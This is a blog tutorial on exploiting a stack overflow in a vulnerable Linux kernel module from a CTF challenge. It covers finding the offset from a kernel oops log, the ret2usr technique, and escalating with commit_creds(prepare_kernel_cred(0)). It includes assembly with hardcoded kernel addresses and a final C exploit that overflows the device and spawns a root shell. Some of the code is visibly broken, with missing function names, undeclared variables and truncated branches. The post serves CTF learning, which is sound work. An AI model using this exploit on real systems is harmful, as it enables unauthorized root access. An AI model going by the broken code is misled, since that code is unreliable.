# Linux Kernel Exploitation - BOF (part1)

Posted on Sat, Jul 31, 2021

# Exploitation

Here comes the part you have been waiting for, now that you are familiar with the basics of the kernel (for exploitation) we will finally see the main subject of this article

I want to say that the exploitation in pwn are often very contextual and that the example that I am going to show you does not apply necessarily for all but I am going to try to globalize a maximum this part so that you can exploit other cases

For this part I will use a challenge of a ctf of an exploitation of a kernel I will show you the different exploitation techniques

## First approach

As said before we will exploit a custom kernel module vulnerable to a buffer overflow vulnerability (in our case a stack overflow based )

Note: in this first case no protection is activated and the source code is not provided (it is possible that the source code of the module is provided with the challenge)

So in this part we are going to see a basic and very efficient technique in the exploitation of a kernel

But first let's just try to find the entrypoint

Wait, this is your first kernel operation, you have arrived on an environment and you don't understand anything? Don't worry, I'll explain it to you quickly

In most cases, the module will be given along with some files that ultimately use qemu as the emulator for a Linux system or image from vmware or virtualbox

## Kernel stack layout

On Linux, every thread on your system has a corresponding kernel stack allocated in kernel memory. Linux kernel stacks on x86 are either 4096 or 8192 bytes in size, depending on your distribution. While this size may seem small to contain a full call chain and associated local stack variables, in reality the kernel call chains are relatively shallow and kernel functions are discouraged from abusing the precious space with large local stack variables when efficient allocators such as the SLUB are available.

The stack shares the 4k/8k total size with the thread_info structure, which contains some metadata about the current thread, as seen in include/linux/sched.h:

union thread_union {
};

struct thread_info {
struct exec_domain *exec_domain;
__u32 flags;
__u32 status;
__u32 cpu;
int preempt_count;
struct restart_block restart_block;
void __user *sysenter_return;
#ifdef CONFIG_X86_32
unsigned long previous_esp;
__u8 supervisor_stack[0];
#endif
int uaccess_err;
};

### Visualising kernel stack

if the attacker provides a sufficiently large count, the stack may extend down past the boundary of thread_info, allowing the attacker to subsequently write arbitrary values into the thread_info structure. Extending the stack pointer past the thread_info boundary would look like the following:

## File system env explication

Shell script to run the qemu emulation

• vmlinuz or bzImage

This file is simply the kernel itself but compressed into a single file. It can be extracted into an ELF executable file "vmlinux" Useful to look for gadgets when doing a rop.

Tool for extract:

##### linux/extract-vmlinux at master · torvalds/linux

Linux kernel source tree. Contribute to torvalds/linux development by creating an account on GitHub.

• initramfs.cpio.gz

the Linux file system that is compressed with cpioand gzip, directories such as /bin/etc, … are stored in this file, also the vulnearable kernel module is likely to be included in the file system as well. For other challenges, this file might come in some other compression schemes.

We will be interested in this file in the article on rop because we will interact with

Or you can see all explication in basics unit

## Analyzing kernel module

/!\ The source code has not been provided for this challenge

## Sending data via FD

As the module is a char module containing the syscall open,close,read,write,... we can conclude that sending data via a file descriptor is a good solution

Quick reminder of what a File descriptor is: In Unix and Unix-like computer operating systems, a file descriptor (FD, less frequently fildes) is a unique identifier (handle) for a file or other input/output resource.

I remind him that it is not necessarily the same cases the pwn is very contextual

void open_fd_device(void)
{
fd_device_global = open("/dev/bof", O_RDWR);
if(fd_device_global < 0) {
printf("[x] Error opening file descriptor\n");
exit(-1);
} else {
printf("[*] File descriptor opened with sucess\n");
}
}

In this case finally by sending data in this file descriptor we managed to send data in kernel space

write(fd_device_global, "A", 1);

To find the padding I can let your imagination guide you, debugging can be used but not necessarily necessary, you must know that when the kernel "segfault" it returns a calltrace and the stack dump

For example by sending this cyclic string you can notice the value of eip has been overwritten by our string so from the recovered string in your cyclic string and calculate the number of bytes

aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaaua
aavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboa
abpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaa
aebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaae
vaaewaaexaaeyaae

[   53.345658] BUG: unable to handle kernel paging request at 6161616b
[   53.346067] IP: 0x6161616b
[   53.346067] *pde = 00000000
[   53.346067]
[   53.346067] Oops: 0010 [#1] SMP
[   53.346067] Modules linked in: ch39(O)
[   53.346067] CPU: 0 PID: 1015 Comm: sh Tainted: G           O    4.10.3 #4
[   53.346067] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1ubuntu1 04/01/2014
[   53.346067] EIP: 0x6161616b
[   53.346067] EFLAGS: 00000286 CPU: 0
[   53.346067] EAX: 0000c4b8 EBX: 61616169 ECX: 0000000a EDX: c1cda0b9
[   53.346067] ESI: c2800040 EDI: c1cd9f70 EBP: 6161616a ESP: c1cd9ef0
[   53.346067]  DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
[   53.346067] CR0: 80050033 CR2: 6161616b CR3: 01ce3000 CR4: 001006d0
[   53.346067] Call Trace:
[   53.346067] Code:  Bad EIP value.
[   53.346067] EIP: 0x6161616b SS:ESP: 0068:c1cd9ef0
[   53.346067] CR2: 000000006161616b
[   53.398715] ---[ end trace d9828823a84a77f6 ]---

The Instruction pointer point to 0x6161616b that in ascii is aaak

which means that from our aaak string we start to overwrite the instruction pointer

so here 40 bytes is our padding

## ret2usr attack

This technique is a popular one which consists in redirecting the program flow until it jumps to userland in order to possibly interact with the userland via the kernel mode, and then we could have arbitrary code execution

here you have a not detailed schema

### More details...

An interesting instruction allows to go back to user land: sysretq or iretq in 64bits (iretd in 32bits)

This instruction allows to make a return of interuption and returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task

To make the flow return to the userland iretq needs the stack to be configured with the following 5 values: RIP|CS|RFLAGS|SP|SS

in order to save the state of the current registers so that the interruption can be carried out without any problem when switching to user mode

unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void escalate_privs(void)
{
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;"
"call rax; mov rdi, rax;"
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}

in the case of the schema 0x13371337 is pointing at the save_state() function.

here it registers well the state of the registers so that our final instruction during the increase of the privillege is iret

## Privilege escalation via kernel symbols

### How it works ?

Did I tell you about kernel pointers?

You know what is in /proc/kallsyms

No ?

Ok so little reminder, you'll see it's simple, all that is in /proc/kallsyms are the kernel symbols

The kernel can call them and use them as fonction and variables

You can see the content via the following command \$ cat /proc/kallsyms

But you're going to tell me "how is this going to help us?"

It is simple remember that we redirect the flow of the kernel and therefore if we redirect its flow so that it can make call to this is symbols

But which one can be interesting ?

Let me introduce you to our friend ..

prepare_kernel_cred !

Why? I will explain to you

prepare_kernel_cred() is a kernel « cred » structure from cred.c you can find the source code here

##### cred.c - kernel/cred.c - Linux source code (v5.13.12) - Bootlin

Elixir Cross Referencer - Explore source code in your browser - Particularly useful for the Linux kernel and other low-level projects in C/C++ (bootloaders, C libraries...)

It is by analyzing the source code of the structure that it will be interesting

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;

new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;

kdebug("prepare_kernel_cred() alloc %p", new);

if (daemon)
else
old = get_cred(&init_cred);

validate_creds(old);

*new = *old;
new->non_rcu = 0;
atomic_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);

#ifdef CONFIG_KEYS
new->session_keyring = NULL;
new->process_keyring = NULL;
new->request_key_auth = NULL;
#endif

#ifdef CONFIG_SECURITY
new->security = NULL;
#endif
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;

new->ucounts = get_ucounts(new->ucounts);
if (!new->ucounts)
goto error;

put_cred(old);
validate_creds(new);
return new;

error:
put_cred(new);
put_cred(old);
return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);

I will extract the most interesting part

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;

new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;

kdebug("prepare_kernel_cred() alloc %p", new);

if (daemon)
else
old = get_cred(&init_cred);

And here is something interesting you can see in the first condition that the structure will check in parameter if a process exists

If yes it will execute get_task_cred() on the process but it's still not what we're looking for

What is interesting here is what happens if there is no process (if it is null)

It will enter in the « else » and call get_cred() which takes as parameter a structure value and will receive it

from the value of &init_cred

And looking inside we can see that in fact it will initiate a new structure with high rights as you can see below (GLOBAL_ROOT_UID)

struct cred init_cred = {
.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
.subscribers		= ATOMIC_INIT(2),
.magic			= CRED_MAGIC,
#endif
.uid			= GLOBAL_ROOT_UID,
.gid			= GLOBAL_ROOT_GID,
.suid			= GLOBAL_ROOT_UID,
.sgid			= GLOBAL_ROOT_GID,
.euid			= GLOBAL_ROOT_UID,
.egid			= GLOBAL_ROOT_GID,
.fsuid			= GLOBAL_ROOT_UID,
.fsgid			= GLOBAL_ROOT_GID,
.securebits		= SECUREBITS_DEFAULT,
.cap_inheritable	= CAP_EMPTY_SET,
.cap_permitted		= CAP_FULL_SET,
.cap_effective		= CAP_FULL_SET,
.cap_bset		= CAP_FULL_SET,
.user			= INIT_USER,
.user_ns		= &init_user_ns,
.group_info		= &init_groups,
.ucounts		= &init_ucounts,
};

And to initialize a cred structure you will need the commit_creds() structure that

Install a new set of credentials to the current task, using RCU to replace * the old set. Both the objective and the subjective credentials pointers are * updated. This function may not be called if the subjective credentials are * in an overridden state.

This leads us to finally do in the flow execution redirection :

commit_creds(prepare_kernel_cred(0))

This technique can not be done if kaslr and smep are activated or else it will be necessary to bypass the protection

Here you can find a function to parse the addresse of symbols

unsigned long kallsym_getaddr(const char* str)
{
FILE *stream;
char fbuf[256];

stream = fopen("/proc/kallsyms","r");
if(stream < 0)
{
printf("failed to open /proc/kallsyms\n");
return 0;
}

memset(fbuf,0x00,sizeof(fbuf));

while(fgets(fbuf,256,stream) != NULL)
{
char *p = fbuf;

if(strlen(fbuf) == 0)
continue;

fbuf[strlen(fbuf)-1] = '\0';

while(*p != ' ')
*a++ = *p++;

p+=3;
if(!strcmp(p,str))
}
return 0;
}

or directely coded in nasm

void escalate_privs(void){
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;"
"call rax; mov rdi, rax;"
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}

## Recap of exploitation

So as a recap of what we have to do, we are going to send the necessary padding in order to reach the instruction pointer, we are going to overwrite its value by the value of our function escalate_privs() and to spawn a shell and the trick will be done

Here no protection is activated so some steps are not necessary

## Final exploitation script

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

int fd_device_global;

unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);

{
FILE *stream;
char fbuf[256];

stream = fopen("/proc/kallsyms","r");
if(stream < 0)
{
printf("failed to open /proc/kallsyms\n");
return 0;
}

memset(fbuf,0x00,sizeof(fbuf));

while(fgets(fbuf,256,stream) != NULL)
{
char *p = fbuf;

if(strlen(fbuf) == 0)
continue;

fbuf[strlen(fbuf)-1] = '\0';

while(*p != ' ')
*a++ = *p++;

p+=3;
if(!strcmp(p,str))
}
return 0;
}

void get_shell()
{

if (getuid() == 0){
printf("[+] Root shell success !\n");
system("/bin/sh");
}
printf("[-] failed to get root shell.\n");
}

void open_fd_device(void)
{
fd_device_global = open("/dev/vuln", O_RDWR);
if(fd_device_global < 0) {
printf("[-] Error opening file descriptor\n");
exit(-1);
} else {
printf("[+] File descriptor opened with sucess\n");
}
}

void escalate_privs(void){
commit_creds(prepare_kernel_cred(0));
}

int main(void)
{
char buffer[40];

open_fd_device();
for(int i = 1; i <= 40; i++) {
write(fd_device_global, "A", 1);
}
// overwrite with escalate_privs() function to set global_root privs
write(fd_device_global, "\xdb\x8a\x04\x08...", 4); // find with objdump
// spawn a shell with root permissions
get_shell();
return(0);
}

I remind again that this is a contextual case that all cases are not the same in order to remedy often the source code of the module is provided and is important to be analyzed otherwise debug

I tried to globalize as much as possible

# End of part 1

Thank you for reading my article

I hope you liked it Don't hesitate to join me on my network

And see you in part 2 🙂

##### Hack The Box :: Penetration Testing Labs

Login to the Hack The Box platform and take your pen-testing and cyber security skills to the next level!

##### xlt-xau-xef-x0d - Overview

🌚 | | CTF Player | | pwner |. xlt-xau-xef-x0d has 9 repositories available. Follow their code on GitHub.

Kernel exploitation part 2:

Linux Kernel Exploitation - ROP (part2)